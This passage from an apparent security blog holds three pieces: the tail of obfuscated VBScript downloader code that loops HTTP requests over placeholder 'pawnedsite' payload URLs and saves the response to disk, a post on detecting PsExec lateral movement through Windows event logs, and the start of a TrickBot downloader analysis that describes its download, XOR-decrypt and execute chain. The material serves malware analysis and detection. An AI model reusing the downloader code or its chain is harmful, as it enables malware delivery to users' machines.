astp = 3 * astp<br />
end if<br />
End Function<br />
Dim Valery 'As Integer<br />
UltraXgettingBelish = UltraXgettingBelish + "-"<br />
<br />
Dim Twelve 'As Integer<br />
Dim sDecimalVis 'As String<br />
Dim UltraXgettingPetir 'As String<br />
UltraXgettingPetir = "Ag"<br />
<br />
Dim MarketPlaceibility 'As String<br />
<br />
<br />
Dim sNodeKey 'As String<br />
Dim sParentKey 'As String<br />
<br />
<br />
<br />
<br />
Twelve = 11 + 1<br />
zTempVis = JohnTheRipper(1)<br />
<br />
'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))<br />
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")<br />
<br />
Set StateUovertakes4000 = CreateObject("Adodb.streaM")<br />
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))<br />
<br />
<br />
Function SetUA()<br />
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA<br />
End Function<br />
<br />
if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then <br />
<br />
<br />
mual = Array("<b><span style="background-color: yellow;">pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload</span></b>")<br />
<br />
Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))<br />
<br />
end if <br />
<br />
<br />
Public Function Anim2UniBall(i)<br />
Dim Rx, Ry, rBuff<br />
Dim xt, yt, j, e<br />
Dim NewX, NewY, d, SgnX, SgnY<br />
Dim RatioX, RatioY<br />
Rx = 452<br />
Ry = 81<br />
<br />
<br />
If SgnY = 1 Then 'y positive testing<br />
For d = UniBall(i).BallY + 1 To NewY<br />
j = WeaponTouch(6, i, NewX, d)<br />
If j = -6 Then<br />
UniBall(i).BMoveY = UniBall(i).BMoveY * -1<br />
NewY = d - 1<br />
Exit For<br />
End If<br />
Next<br />
End If<br />
<br />
If SgnY = -1 Then 'y negative testing<br />
For d = UniBall(i).BallY - 1 To NewY Step -1<br />
j = WeaponTouch(6, i, NewX, d)<br />
If j = -6 Then<br />
UniBall(i).BMoveY = UniBall(i).BMoveY * -1<br />
NewY = d + 1<br />
Exit For<br />
End If<br />
Next<br />
End If<br />
j = WeaponTouch(6, i, NewX, NewY)<br />
If j = -7 Then Exit Function<br />
<br />
UniBall(i).BallX = NewX<br />
UniBall(i).BallY = NewY<br />
End Function<br />
<br />
<br />
Valery = 89210<br />
<br />
<br />
UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))<br />
Dim i<br />
'on error GoTo nextU<br />
' on error resume next<br />
sTempVis = JohnTheRipper(Twelve)<br />
<br />
Sub SendFlagDat(SndTo)<br />
Dim i , b , n <br />
Dim oNewMsg() , lNewOffSet <br />
Dim lNewMsg <br />
<br />
For i = 1 To UBound(Flag1, 2)<br />
<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 1<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag1(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag1(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry1(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag2, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 2<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag2(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag2(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry2(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag3, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 3<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag3(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag3(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry3(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag4, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 4<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag4(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag4(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry4(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
For i = 1 To UBound(Flag5, 2)<br />
lNewMsg = MSG_FLAGS<br />
lNewOffSet = 0<br />
ReDim oNewMsg(0)<br />
AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet<br />
b = 5<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
b = i<br />
AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet<br />
n = Flag5(0, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = Flag5(1, i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
n = FlagCarry5(i)<br />
AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet<br />
SendTo oNewMsg, CInt(SndTo)<br />
Next<br />
<br />
End Sub<br />
<br />
MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)<br />
<br />
UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"<br />
<br />
rdde = 19<br />
<br />
<br />
lTo = UBound(mual)<br />
For i = 0 To lTo Step 1<br />
rdde = rdde * 8<br />
<br />
on error resume next<br />
<br />
Valery = Valery +33<br />
UltraXgetting4 = MarketPlace + mual(i)<br />
UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False<br />
dr1=2<br />
<br />
rdde = rdde + 91<br />
<br />
<br />
SetUA()<br />
UltraXgettingFuks " d "<br />
If UltraXgettingRickyTIcky.Status +3 = 203 Then<br />
UltraXgettingstatus = true<br />
Exit For<br />
End If<br />
<br />
goto14:<br />
Next<br />
<br />
on error goto 0<br />
if UltraXgettingstatus Then<br />
Dim Ratchet 'As String<br />
UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis<br />
<br />
F3 "",4<br />
StateUovertakes4000.Type = 1<br />
StateUovertakes4000.Open<br />
StateUovertakesgetting2 22 <br />
WriteCD StateUovertakes4000,UltraXgettingResponseBody<br />
dttat =4<br />
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock <br />
<br />
dttat = dttat*2<br />
<br />
StateUovertakesgetting()<br />
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long<br />
<br />
UltraXgettingJohnSnowu = 3012<br />
<br />
If 1040 < UltraXgettingJohnSnowu Then<br />
drba =55<br />
UltraXgettingTmp1 = "|"<br />
<br />
UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"<br />
End If<br />
<br />
<br />
<br />
triada = 341<br />
end if<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-49652484756874194892017-08-01T23:45:00.000-07:002017-08-02T00:01:01.185-07:00Detecting Lateral Movement - PsExec execution with Demo<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<br />
<br />
PsExec can be used quite easily on any network to move laterally from one system to another. Here's one way of detecting lateral movement.<br />
<br />
<br />
Demo:<br />
We'll create a PsExec session and then look for the events and note them down. These can then be used for monitoring alerts or forensic investigations.<br />
<br />
Launch a PsExec session from one machine to another and note the time:<br />
<br />
Machine A - <br />
<div class="separator" style="clear: both; text-align: left;">
<img border="0" data-original-height="101" data-original-width="920" height="69" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9cxuSMEoPc_ieHk3XeAFoFHw7s719n1FyfniTVHzO3vkQxP7hw-lDzu-cTpBdhc2z1sj9MnP-UfNbd637YvEiM34qRDsdQNZFwVAlPSZ-MUExCcqg3AedCIya6Ftwe_8IwAiTq5q9TpW/s640/1.png" width="640" /> </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Session launched on Machine B - </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-jxxxS6JmLslwCTSv7uutFFAqoEB-fdhPB3FkWzsRYG8SNidmBqOHAYKf6ipRupzecxf1-YrFGzF6-UaKCHvPt1phRMIhjnKfrIR7e8yV9rQ1esuHRFipZ6Lz4I7ecHzY_3dsym4RNAa/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1013" data-original-width="1298" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-jxxxS6JmLslwCTSv7uutFFAqoEB-fdhPB3FkWzsRYG8SNidmBqOHAYKf6ipRupzecxf1-YrFGzF6-UaKCHvPt1phRMIhjnKfrIR7e8yV9rQ1esuHRFipZ6Lz4I7ecHzY_3dsym4RNAa/s640/2.png" width="640" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9cxuSMEoPc_ieHk3XeAFoFHw7s719n1FyfniTVHzO3vkQxP7hw-lDzu-cTpBdhc2z1sj9MnP-UfNbd637YvEiM34qRDsdQNZFwVAlPSZ-MUExCcqg3AedCIya6Ftwe_8IwAiTq5q9TpW/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"> </a><br />
<br />
<br />
<br />
Now we look through the Windows Events Viewer and find the events for this session.<br />
Looking through the Security events, we can see in the image below the Logon event (ID 4624) was created for the session that we launched (note the timestamp). <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWAd4K3RmI_qJ7cN2X-Vu78SFd1zQg8fEBi45SOLB-sz1L7dWZ0Az4jLbrSL9STI02xhsnQtCchSwSCVVQgAbeNlVCKhpv35uBHyLGCTkWVVcMN_vlwAEwvl3CLTVJRodwP57eSQz3Fbt/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="213" data-original-width="621" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYWAd4K3RmI_qJ7cN2X-Vu78SFd1zQg8fEBi45SOLB-sz1L7dWZ0Az4jLbrSL9STI02xhsnQtCchSwSCVVQgAbeNlVCKhpv35uBHyLGCTkWVVcMN_vlwAEwvl3CLTVJRodwP57eSQz3Fbt/s640/3.png" width="640" /></a></div>
<br />
<br />
Details of the event should give us more information on the event. <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpm-LohX-WeMoa-DDpQoNMSaeqOC6eY4mfc7m9YO1hyphenhyphen-qhRsMh9DBNnVPTLd11iyQP34daZtaItk_BAbgAxV9q51aqFzxEEH0h55pghhtLxIdZxN_6E5oPuaVir0QvNRCJDoFBoWw0wM0N/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="574" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpm-LohX-WeMoa-DDpQoNMSaeqOC6eY4mfc7m9YO1hyphenhyphen-qhRsMh9DBNnVPTLd11iyQP34daZtaItk_BAbgAxV9q51aqFzxEEH0h55pghhtLxIdZxN_6E5oPuaVir0QvNRCJDoFBoWw0wM0N/s640/4.png" width="640" /></a></div>
<br />
<br />
This tells us clearly that the logon was from our Machine A, through PsExec:<br />
<div class="separator" style="clear: both; text-align: left;">
Next, we need to look for the service that was created as part of this session. PsExec creates the process PSEXECSV.exe on the host system when successfully launched. <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-rcOTg2peeCKbsshdB8388GwPnkTOwmIUDhW5rD6Ak9NkxiMMeENmXinOvWOjrodu7Gjmu6_z_ouVpsG8ouS9IdNN1EOCspH95H677e9RqpJLXw3PVf-Ps1qW1VSHKG__geWwf81HGbms/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="254" data-original-width="774" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-rcOTg2peeCKbsshdB8388GwPnkTOwmIUDhW5rD6Ak9NkxiMMeENmXinOvWOjrodu7Gjmu6_z_ouVpsG8ouS9IdNN1EOCspH95H677e9RqpJLXw3PVf-Ps1qW1VSHKG__geWwf81HGbms/s640/10.png" width="640" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7Q7Zi8O-fBdoKNy5QkDsaXfVpll-FUgUvidWbNQ84dr-8ogdeGSAdetjiWvTy-9Snt3ChCGflta1Halwf6sGnf_4JwUcuS-c2LNp-4K08HFt10AAAnRq4ZSovaVTPSkIfZmwFewvz7y4/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="221" data-original-width="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7Q7Zi8O-fBdoKNy5QkDsaXfVpll-FUgUvidWbNQ84dr-8ogdeGSAdetjiWvTy-9Snt3ChCGflta1Halwf6sGnf_4JwUcuS-c2LNp-4K08HFt10AAAnRq4ZSovaVTPSkIfZmwFewvz7y4/s1600/6.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In order to find that the process created on this host system (Machine B), we need to look under the System events.</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-rcOTg2peeCKbsshdB8388GwPnkTOwmIUDhW5rD6Ak9NkxiMMeENmXinOvWOjrodu7Gjmu6_z_ouVpsG8ouS9IdNN1EOCspH95H677e9RqpJLXw3PVf-Ps1qW1VSHKG__geWwf81HGbms/s1600/10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDX48i2SZdjPaELyD4QcrpDPSgskevjNhDvwj1QzAZ-dKigyO8s-eYPWRZv1YwYHfKs6dw5B7ACeR9BqxuiARkTkwoY4PTEeF-IiU4PlJLKvicLSMOCwrcSoANTEXs75lABidJyl8jgfbl/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="76" data-original-width="598" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDX48i2SZdjPaELyD4QcrpDPSgskevjNhDvwj1QzAZ-dKigyO8s-eYPWRZv1YwYHfKs6dw5B7ACeR9BqxuiARkTkwoY4PTEeF-IiU4PlJLKvicLSMOCwrcSoANTEXs75lABidJyl8jgfbl/s640/5.png" width="640" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-rcOTg2peeCKbsshdB8388GwPnkTOwmIUDhW5rD6Ak9NkxiMMeENmXinOvWOjrodu7Gjmu6_z_ouVpsG8ouS9IdNN1EOCspH95H677e9RqpJLXw3PVf-Ps1qW1VSHKG__geWwf81HGbms/s1600/10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"> </a><br />
<br />
<br />
<br />
Look at the details:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivYdabKcsWg17Zj6vDhIRCXELuP_6jGk_hyphenhyphennuI9waOxN3Z2Yts97jZGnLp25zxXBeOB2jpWGHZdiNnmv8rv6g7uZdMWzubcclShF-1IwvQT0eFBdmudvX6aB3BGojFhRebLciHwoHS1XXg/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="122" data-original-width="306" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivYdabKcsWg17Zj6vDhIRCXELuP_6jGk_hyphenhyphennuI9waOxN3Z2Yts97jZGnLp25zxXBeOB2jpWGHZdiNnmv8rv6g7uZdMWzubcclShF-1IwvQT0eFBdmudvX6aB3BGojFhRebLciHwoHS1XXg/s400/7.png" width="400" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqf4qOQIx56UtHoHZGmxahHyUn2MMERw-aBICNI0TzhYfvx9hq3rH4HeXpvdtIL8D1FMdt9AF9x2VAD1HNg8znsgzd0XMCSkuIIX069nmkSgSup2lmeZPts1GC-IayEJC0AOR0QsORHLGj/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="193" data-original-width="441" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqf4qOQIx56UtHoHZGmxahHyUn2MMERw-aBICNI0TzhYfvx9hq3rH4HeXpvdtIL8D1FMdt9AF9x2VAD1HNg8znsgzd0XMCSkuIIX069nmkSgSup2lmeZPts1GC-IayEJC0AOR0QsORHLGj/s400/8.png" width="400" /></a></div>
<br />
<br />
<br />
These are the events you need to monitor/investigate for PsExec execution on the host systems. The whole process can be automated through a SIEM for passive monitoring for security events or can be executed ad-hoc as needed for investigations and incident response.<br />
<br />
When investigating systems post-incident, you can acquire the events files at this location in Win8* :<br />
<br />
C:\Windows\System32\winevt\Logs<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKtYEclbSMKfTyBGfoROO_MHPCULt0FkD6pOCl7HoVSLcOL7c-wgU_9usgAVh1sv3rmx9wW1mt8aeaI_yEOadXKPg4Q702TuGhQ-ekWG8fQgkZ67zbj6_Wg_SkRY51s2oSL79aH78E8RkR/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="646" data-original-width="884" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKtYEclbSMKfTyBGfoROO_MHPCULt0FkD6pOCl7HoVSLcOL7c-wgU_9usgAVh1sv3rmx9wW1mt8aeaI_yEOadXKPg4Q702TuGhQ-ekWG8fQgkZ67zbj6_Wg_SkRY51s2oSL79aH78E8RkR/s400/9.png" width="400" /></a></div>
<br />
<br />
<br />
Once acquired, these files can be reviewed in the Windows Events Viewer on your investigation machine.<br />
<br />
:)<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-14908618187948534232017-07-25T02:07:00.002-07:002017-07-27T02:04:10.382-07:00TrickBot Downloader Deep Dive Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The
downloader comes as a Microsoft Office doc - word or excel, with Macro code. </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Upon
macro enablement, then VB code is executed and the payload is downloaded and
executed. </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br />
<a name='more'></a><br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Flow:</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<ol style="direction: ltr; font-family: Calibri; font-size: 11.0pt; font-style: normal; font-weight: normal; margin-bottom: 0in; margin-left: .375in; margin-top: 0in; unicode-bidi: embed;" type="1">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;" value="1"><span style="font-family: "calibri"; font-size: 11.0pt; font-style: normal; font-weight: normal;">Downloader
execution - document is opened in word or excel</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">The Macro-code is enabled and
executed</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">Script makes a call to
download the payload from the internet</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">Encrypted payload is
downloaded </span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">Payload is decrypted using
the running XOR key</span></li>
<li lang="en-AU" style="margin-bottom: 0; margin-top: 0; vertical-align: middle;"><span style="font-family: "calibri"; font-size: 11.0pt;">Decrypted payload is saved as
a different file and then executed</span></li>
</ol>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Step by
step analysis:<br />
<br />
Declarations ><br />
<br />
Public MarkusPils() As String<br />
Public BladeRunner_4 As String<br />
<br />
Public Const BladeRunner_System = "User-Agent"<br />
Public SubProperty As Object<br />
<br />
<br />
Public BladeRunner_VEAM As Object<br />
Public BladeRunner_Fish As Integer<br />
<br />
<br />
Public AlertN() As String<br />
<br />
Public AlertNE As String<br />
<br />
Public BladeRunner_PokerFace As Variant<br />
Public BladeRunner_aifde As Object<br />
Public BladeRunner_FLAME As String<br />
Public BladeRunner_avatar As Object<br />
<br />
Public smbi As String<br />
Public BladeRunner_2 As String<br />
Public Const Quubo = 0<br />
<br />
<br />
<br />
<br />
Public Stocke As Integer<br />
Public BladeRunner_Project As String<br />
Public C2H5OHName As String<br />
Public BladeRunner_PathTo2 As String<br />
Public CofeeShop As Object </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<!--StartFragment-->
<!--EndFragment--><br />
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Start
><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGFc8TkBixqzRbdma_HNKBRO2w3StDh8G237VnTo6GEpQszFNt1K-9dnPcaHeZEACAEH_xwNFQ95xLWi_A6SE1e_jODHLyz28ccF-Snvo76T1Eagd4FYZ6QpoGxjVFcnsG4vDwzy73Vv01/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="237" data-original-width="701" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGFc8TkBixqzRbdma_HNKBRO2w3StDh8G237VnTo6GEpQszFNt1K-9dnPcaHeZEACAEH_xwNFQ95xLWi_A6SE1e_jODHLyz28ccF-Snvo76T1Eagd4FYZ6QpoGxjVFcnsG4vDwzy73Vv01/s400/1.png" width="400" /></a></div>
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment--><!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<div class="separator" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV4ePABQsgoQRUe-dvGVN-Wx40XZN3rd7cvi6muoBNiUG8kLwxOnFD7H-1yGsAXZhxXknUPqaMvu-3cARNqFB1o-YjY-W4G8p7YUC_L1Ao-Mfboo67qQM4uFwZIw6gB1Bq7Vrp_my_JwYQ/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><img border="0" data-original-height="469" data-original-width="1203" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV4ePABQsgoQRUe-dvGVN-Wx40XZN3rd7cvi6muoBNiUG8kLwxOnFD7H-1yGsAXZhxXknUPqaMvu-3cARNqFB1o-YjY-W4G8p7YUC_L1Ao-Mfboo67qQM4uFwZIw6gB1Bq7Vrp_my_JwYQ/s400/2.png" width="400" /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<!--StartFragment-->
<!--EndFragment--><br />
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Grabs all
the variables from the doc properties ></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZZjJKBv2ZWxhvZrKnc68t8HX1mmzsqad2SlZ3MfZLHMdxFUIIMPgBR-tE9dFqTKbS_CgckK-x76927pDAskcAVBKAm1LXzoGA7IebXENH79wldvcy7s07vwAu3nDZkRZHzqBjW7quFCx0/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="467" data-original-width="1235" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZZjJKBv2ZWxhvZrKnc68t8HX1mmzsqad2SlZ3MfZLHMdxFUIIMPgBR-tE9dFqTKbS_CgckK-x76927pDAskcAVBKAm1LXzoGA7IebXENH79wldvcy7s07vwAu3nDZkRZHzqBjW7quFCx0/s400/3.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And here's the complete string:<br />
<div class="separator" style="clear: both; text-align: center;">
